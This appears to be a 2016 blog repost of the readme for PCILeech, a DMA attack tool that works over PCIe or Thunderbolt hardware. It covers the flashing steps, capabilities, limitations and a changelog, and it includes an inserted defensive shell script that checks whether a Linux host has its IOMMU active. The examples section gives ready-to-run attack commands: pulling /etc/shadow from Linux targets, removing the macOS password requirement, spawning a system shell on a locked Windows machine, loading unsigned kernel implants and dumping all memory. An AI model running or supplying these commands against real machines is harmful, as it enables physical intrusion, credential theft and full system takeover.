Published on October 27th, 2016
PCILeech – Direct Memory Access (DMA) Attack Software
- USB3380-EVB mini-PCIe card.
- PP3380-AB PCIe card.
- PE3B - ExpressCard to mini-PCIe.
- PE3A - ExpressCard to PCIe.
- ADP - PCIe to mini-PCIe.
- Sonnet Echo ExpressCard Pro - Thunderbolt to ExpressCard.
Flashing (Linux):
- cd /pathtofiles
- make
- [ insert USB3380 hardware into computer ]
- insmod pcileech_flash.ko
- If loading the kernel module fails, install the build prerequisites with: apt-get update && apt-get install gcc make linux-headers-$(uname -r) and try again.
- rmmod pcileech_flash
- If there is an error, flashing is unsuccessful. Please try again and check any debug error messages by issuing the command: dmesg
Capabilities:
- Retrieve memory from the target system at >150MB/s.
- Write data to the target system memory.
- 4GB memory can be accessed in native DMA mode.
- ALL memory can be accessed if kernel module (KMD) is loaded.
- Execute kernel code on the target system.
- Spawn system shell [Windows].
- Spawn any executable [Windows].
- Load unsigned drivers [Windows].
- Pull files [Linux, FreeBSD, Windows, macOS].
- Push files [Linux, Windows, macOS].
- Patch / Unlock (remove password requirement) [Windows, macOS].
Limitations:
- Read and write errors on some older hardware. Try "pcileech.exe testmemreadwrite -min 0x1000" to test memory reads and writes against the physical address 0x1000 (or any other address) in order to confirm.
- Does not work if the OS uses the IOMMU/VT-d. This is the default on macOS (unless disabled in recovery mode). Windows 10 Enterprise with virtualization based security features enabled does not work fully; this is however not the default setting in Windows 10.
- Some Linux kernels do not work: sometimes a required symbol is not exported by the kernel and PCILeech fails.
- Linux might also not work if some virtualization based features are enabled.
- Linux based on the 4.8 kernel does not work (Ubuntu 16.10).
- Windows Vista: some shellcode modules such as wx64_pscmd do not work.
- Windows 7: signatures are not published.
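Since the limitations above make an active IOMMU/VT-d the condition under which native DMA access fails, the check a defender most wants on a Linux host is whether the IOMMU is actually enabled. The following POSIX shell script is an added example, not part of PCILeech or of this post. It treats a populated /sys/kernel/iommu_groups as evidence that the IOMMU is active (that directory is filled by the kernel's IOMMU core when devices are placed in groups) and otherwise falls back to looking for intel_iommu=on or amd_iommu=on on the kernel command line. Both paths are parameters with the real locations as defaults, so the same functions can be exercised against a constructed directory tree; the sysfs layout is assumed from the mainline Linux kernel and the result is a heuristic, not proof of DMA protection for every device.

```shell
#!/bin/sh
# iommu_check.sh (added example): report whether a Linux host has an IOMMU
# active, i.e. the condition that stops the native DMA access described above.

# True when the IOMMU groups directory exists and contains at least one group.
# $1: groups directory (defaults to the real sysfs location).
iommu_groups_present() {
    dir="${1:-/sys/kernel/iommu_groups}"
    [ -d "$dir" ] || return 1
    n=$(find "$dir" -mindepth 1 -maxdepth 1 -type d 2>/dev/null | wc -l | tr -d ' ')
    [ "$n" -gt 0 ]
}

# True when the kernel command line explicitly requests an IOMMU.
# $1: command-line file (defaults to /proc/cmdline).
iommu_cmdline_enabled() {
    file="${1:-/proc/cmdline}"
    [ -r "$file" ] || return 1
    grep -Eq '(^|[[:space:]])(intel_iommu=on|amd_iommu=on|iommu=force)([[:space:]]|$)' "$file"
}

# Prints one of:
#   protected   - IOMMU groups exist, so DMA remapping is in effect
#   requested   - IOMMU asked for on the command line but no groups found
#   unprotected - neither signal present (native DMA from a PCIe device works)
# $1: groups directory, $2: command-line file (both optional).
iommu_status() {
    groups_dir="${1:-/sys/kernel/iommu_groups}"
    cmdline="${2:-/proc/cmdline}"
    if iommu_groups_present "$groups_dir"; then
        echo "protected"
    elif iommu_cmdline_enabled "$cmdline"; then
        echo "requested"
    else
        echo "unprotected"
    fi
}

# Run against the live host when executed directly.
echo "IOMMU status on this host: $(iommu_status)"
```

A "requested" result is worth a second look: the parameter is set but no groups appeared, which usually means the firmware did not expose an IOMMU (or VT-d is disabled in the BIOS/UEFI setup), so the host is still exposed to the attack this page describes.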
Examples:
Load macOS kernel module:
pcileech.exe kmdload -kmd macos
Remove macOS password requirement, requires that the KMD is loaded at an address. In this example 0x11abc000 is used.
pcileech.exe macos_unlock -kmd 0x11abc000 -0 1
Retrieve the file /etc/shadow from a Linux system without pre-loading a KMD.
pcileech.exe lx64_filepull -kmd LINUX_X64 -s /etc/shadow -out c:\temp\shadow
Show help for the lx64_filepull kernel implant.
pcileech.exe lx64_filepull -help
Load a kernel module into Windows Vista by using the default memory scan technique.
pcileech.exe kmdload -kmd winvistax64
Load a kernel module into Windows 10 by targeting the page table of the ntfs.sys driver signed on 2016-03-29.
pcileech.exe kmdload -kmd win10x64_ntfs_20160329 -pt
Load a kernel module into Windows 10 (unstable/experimental). Compatible with VBS/VTL0 only if "Protection of Code Integrity" is not enabled.
pcileech.exe kmdload -kmd WIN10_X64
Spawn a system shell on the target system (system needs to be locked and kernel module must be loaded). In this example the kernel module is loaded at address: 0x7fffe000.
pcileech.exe wx64_pscmd -kmd 0x7fffe000
Show help for the dump command.
pcileech.exe dump -help
Dump all memory from the target system given that a kernel module is loaded at address: 0x7fffe000.
pcileech.exe dump -kmd 0x7fffe000
Building:
The binaries are found in the pcileech_files folder. If one wishes to build one's own version it is possible to do so: compile the pcileech and pcileech_gensig projects from within Visual Studio. Tested with Visual Studio 2015. To compile the kernel and shellcode, located in the pcileech_shellcode project, please look into the individual files for instructions. These files are usually compiled from the command line.
Changelog:
v1.0
- Initial release.
v1.1
- core: help for actions and kernel implants.
- core: search for signatures (do not patch).
- core: signature support for wildcard and relative offsets in addition to fixed offsets.
- implant: load unsigned drivers into Windows kernel [wx64_driverload_svc].
- signature: generic Windows 10 (Unstable/Experimental) [win10_x64].
- signature: Windows 10 updated.
- signature: Linux unlock added.
- other: firmware flash support without PLX SDK.
- other: various bug fixes.
v1.2
- core: FreeBSD support.
- implant: pull file from FreeBSD [fbsdx64_filepull]
- signature: Windows 10 updated.
- signature: macOS Sierra added.
- other: various bug fixes and stability improvements.
latest
- new implant: spawn cmd in user context [wx64_pscmd_user]
- implant: stability improvements for Win8+ [wx64_pscreate, wx64_pscmd, wx64_pscmd_user]